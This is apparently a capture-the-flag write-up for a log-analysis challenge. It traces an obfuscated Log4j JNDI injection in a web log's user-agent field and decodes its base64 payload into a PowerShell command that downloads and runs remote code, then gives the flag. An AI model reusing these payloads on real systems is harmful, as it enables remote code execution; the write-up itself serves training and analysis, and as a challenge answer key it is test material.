Statement: We implemented a basic IPS to help protect our site from new attacks.

Somehow, a newer more sophisticated version of a regularly observed attack was successfully executed against the website.

What is the name of the script that was run?

Flag format: Name of the script that was run, case sensitive.

The challenge provides a JSON file containing logs.

These logs and scenarios are designed to be real-ish, they’re simpler and given that the entire data set covers 1hr all malicious activity is conducted on a condensed time frame.

Searching in the logs, I notice that a log4j exploit has been performed:

    "_time": "2021-01-01T09:29:13.000+0000",
    "origin": "",
    "site": "",
    "method": "GET",
    "referer": "",
    "useragent": "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://}",
    "url": "",
    "logSource": "Http:Web"

The payload is base64 encoded, so I will decode it to read the content and get the name of the script:

echo "cG93ZXJzaGVsbC5leGUgLWV4ZWMgYnlwYXNzIC1DICJJRVggKE5ldy1PYmplY3QgTmV0LldlYkNsaWVudCkuRG93bmxvYWRTdHJpbmcoJ2h0dHBzOi8vZG93bnVuZGVyY3RmLmNvbS9wVENOcDVwNkxQMGQ3cUE3N3l2YjRTSGY0MCcpOyI=" | base64 -d

Payload value:

powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('');"

Flag: pTCNp5p6LP0d7qA77yvb4SHf40